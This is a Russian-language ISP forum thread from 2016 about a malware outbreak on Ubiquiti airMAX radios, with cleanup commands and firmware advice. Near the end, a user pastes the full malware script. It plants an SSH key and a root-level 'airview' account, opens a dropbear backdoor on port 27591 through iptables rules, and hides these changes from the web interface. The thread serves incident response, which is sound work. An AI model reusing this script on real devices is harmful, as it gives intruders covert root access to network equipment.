SDE Опубликовано: May 14, 2016 at 21:40 Опубликовано: May 14, 2016 at 21:40 Нус, коллеги признавайтесь, кого сегодня грохнуло? Позиция убнт на форуме особо порадовала)
l1ght Опубликовано: May 14, 2016 at 22:40 Опубликовано: May 14, 2016 at 22:40 ну моя позиция - незащищенным сервисам нефиг делать в паблик инете пардон, вы ж презервативами пользуетесь? есть куча воркараундов, от нестандартных портов, до сокрытия всего и вся и доступом только через VPN последний, как по мне, один из самых надежных боты брутят как UBNT так и MikroTik и вполне себе удачно это делают боты ещё очень любят видео регистраторы)))) они вечно болеют всякими ntp/dns amplification
adik_v Опубликовано: May 18, 2016 at 06:42 Опубликовано: May 18, 2016 at 06:42 Вирус атаки - СРОЧНО @UBNT Кого ламанули и как с этим бороться ? http://community.ubnt.com/t5/airMAX-General-Discussion/Virus-attack-URGENT-UBNT/td-p/1562940
gudwin888 Опубликовано: May 18, 2016 at 08:08 Опубликовано: May 18, 2016 at 08:08 cd /etc/persistentrm rc.poststartrm -rf .mfcfgmtd -w -p /etc/reboot Удаление этого скрипта. Там добавляются правила файрвола, весь смысл этого вируса
adik_v Опубликовано: May 18, 2016 at 09:06 Опубликовано: May 18, 2016 at 09:06 как попасть на антену если все порты кроме 53 закрыты ?
laffytaffy Опубликовано: May 18, 2016 at 09:15 Опубликовано: May 18, 2016 at 09:15 Вот оно что, а то у нас техники третий день голову ломают, чего это Nanostation M2 в дефолте у некоторых абонентов.
gudwin888 Опубликовано: May 18, 2016 at 10:35 Опубликовано: May 18, 2016 at 10:35 (изменено) как вариант по ssh или telnet. Если не поможет ресет на антенне. а потом то что я написал. Прошивка у вас на них какая 5.5.6 и ниже? И не мешало бы обновить Изменено May 18, 2016 at 10:37 пользователем gudwin888
omp Опубликовано: May 18, 2016 at 10:50 Опубликовано: May 18, 2016 at 10:50 gudwin888, нет - это под старый skynet. Потом точки все равно "ломаются" через какое-то время. Лечится только UBNT-шной Removal tool CureMalware-0.7.jar - http://community.ubnt.com/t5/airMAX-General-Discussion/Malware-Removal-Tool-05-15-2016/m-p/1564953/highlight/true#M55507 Она удаляет вирус с точки и прошивает на последнее firmware 5.6.5. Но там, сцуко, нет compliance test. Этот вирус ресетит точки по дефолту со старыми прошивками - и блокирует доступ через веб-интерфейс с новыми прошивками (передача данных при этом продолжает работать).
gudwin888 Опубликовано: May 18, 2016 at 11:02 Опубликовано: May 18, 2016 at 11:02 (изменено) та утилитка не помогает. папки DBG: /bin/echo -ne '\n.skynet=';[ -d /etc/persistent/.skynet ] && /bin/echo true; не существует. а существует .mf. Я делал так cd /etc/persistentrm rc.poststartrm -rf .mfcfgmtd -w -p /etc/reboot потом обновил прошивку до 5.5.10 брал здесь http://rgho.st/58436490. Данная прошивка имеет compliance test skynet папка это у старого вируса. Только вчера исправлял это Изменено May 18, 2016 at 11:05 пользователем gudwin888
Ромка Опубликовано: May 18, 2016 at 11:20 Опубликовано: May 18, 2016 at 11:20 Compliance test на 5.6.5 touch /etc/persistent/ct save reboot Если прошиваться с прошивки с CT на 5.6.5, то после прошивки всё работает, просто в графе страна написано "выберите страну" и ничего не дает менять во вкладке wireless. Выше написанный код помогает. Если сбросить такую антенну потом на завод, то перед первым входом в вэбку нужно так же исполнить этот код, а потом выбрать при логине compliance test, он появится в списке.
omp Опубликовано: May 18, 2016 at 11:39 Опубликовано: May 18, 2016 at 11:39 gudwin888, значит вы ее не правильно готовите. Точки, которые у нас "ломанули" со старыми прошивками и были перепрошиты на прошивку 5.5.10 с compliance test в понедельник - сегодня опять ушли в дефолт. Все, что было прошито этой утилитой на 5.6.5 в понедельник - все работает. Все Наносы настроены роутерами, везде свои логины/пароли - ничего дефолтного. Т.к. это "дырка" в софте UBNT под Ubuntu (индусы, похоже, писали) - то эта утилита точно лечит.
gudwin888 Опубликовано: May 18, 2016 at 11:49 Опубликовано: May 18, 2016 at 11:49 ну мое решение нормально работает, и проблема ушла.
Futura Опубликовано: May 18, 2016 at 14:31 Опубликовано: May 18, 2016 at 14:31 может кто-нибудь в двух словах объяснить что вирус делает и как проникает?
gudwin888 Опубликовано: May 18, 2016 at 14:42 Опубликовано: May 18, 2016 at 14:42 через баг в прошивки, а потом добавляет правила в iptables на input порты 80 и 443
Ромка Опубликовано: May 18, 2016 at 14:47 Опубликовано: May 18, 2016 at 14:47 ну мое решение нормально работает, и проблема ушла. А есть ли гарантии что проблема вновь не проявится на 5.5.10? На форуме ubnt сказано что нужно шиться в 5.6.5.
Jeko Опубликовано: May 18, 2016 at 15:03 Опубликовано: May 18, 2016 at 15:03 может кто-нибудь в двух словах объяснить что вирус делает и как проникает? Проникает через открытый наружу ssh 22 порт.
steelrat Опубликовано: May 18, 2016 at 16:06 Опубликовано: May 18, 2016 at 16:06 Administrator и пароль какой-то...
adik_v Опубликовано: May 18, 2016 at 17:15 Опубликовано: May 18, 2016 at 17:15 Ясно если ломанули то ноги в руки и вперед.... мы так больше 100 набегали
gudwin888 Опубликовано: May 18, 2016 at 17:58 Опубликовано: May 18, 2016 at 17:58 Ну как говорится вскрытие покажет
Ромка Опубликовано: May 20, 2016 at 05:37 Опубликовано: May 20, 2016 at 05:37 Прошивки 5.6.5 XM XW TI версии с Compliance test ubnt5.6.5_ct.zip
kowa_oleg Опубликовано: May 20, 2016 at 12:47 Опубликовано: May 20, 2016 at 12:47 Прошил только что этой прошивкой Ns m2 , СT не обнаружил.
Ромка Опубликовано: May 20, 2016 at 12:57 Опубликовано: May 20, 2016 at 12:57 Прошил только что этой прошивкой Ns m2 , СT не обнаружил. Странно... У нас с NS Loco m5 норм.
kowa_oleg Опубликовано: May 20, 2016 at 12:59 Опубликовано: May 20, 2016 at 12:59 Потом произвел сброс полный и через ssh добавив строку Ct появился.
steelrat Опубликовано: May 22, 2016 at 17:03 Опубликовано: May 22, 2016 at 17:03 Взлом точек продолжается... новая ресия вирусни --------------- #!/bin/sh if [ "$HTTP_HOST" = "localhost.localnet" ]; then PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFF96l+y3hwHFH2W6ayTq6Lnmd1kMqZFB8/t4aQoJbHiqlB+FihP/ntsh+kpRhwCa3eaLD4AedBrvto6rLdjNMRjNUxO67ajO/ekt5jLZPGv1TUfxN69U+Zv9h0d2Z8NNA9jemZHETu GB39Ys7xXbTxD6AIL7YTV7pD3w/twcA2+mupYBHFPs2uJQ6m6fF4m189GAkm1TUtwa41hf02IQHe0aBt0KGM6S9b4s4/B6dm91+bIyCr7n5CYnAUo3kEsWm/hmE8cgQQfyzgkmKDQgXLQhOC46LyJYSR5zZZ6rW7k4Rzi+Dm9op7/EmOxNu0GpJWZoUVR9I HM9q2+ecVYIF" 2>/dev/null >> /etc/dropbear/authorized_keys echo "airview:uNOwPXGzy9ofY:0:0:AirView manager:/etc/persistent:/bin/sh" 2>/dev/null >> /etc/passwd if [ ! -f "/etc/persistent/dropbear_rsa_host_key" ]; then dropbearkey -t rsa -s 1024 -f /etc/persistent/dropbear_rsa_host_key >/dev/null 2>&1 fi dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null iptables -I INPUT -p tcp --dport 22 -j ACCEPT iptables -I INPUT -p tcp --dport 27591 -j ACCEPT fi grep -v -i "authorized_keys" | grep -v -i "\/etc\/passwd" | /bin/cgi "${SCRIPT_FILENAME}" | grep -E -v -i 'span class.*(label|value.*red).*(custom scripts:|enabled)' ----------------- Если я ничего не путаю, то это открытие бэкдора на порту 27591. Можно посканировать... dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null
steelrat Опубликовано: May 22, 2016 at 17:59 Опубликовано: May 22, 2016 at 17:59 Порт от игровых серваков... :-)
Рекомендованные сообщения
Создайте аккаунт или войдите в него для комментирования
Вы должны быть пользователем, чтобы оставить комментарий
Создать аккаунт
Зарегистрируйтесь для получения аккаунта. Это просто!
Зарегистрировать аккаунтВойти
Уже зарегистрированы? Войдите здесь.
Войти сейчас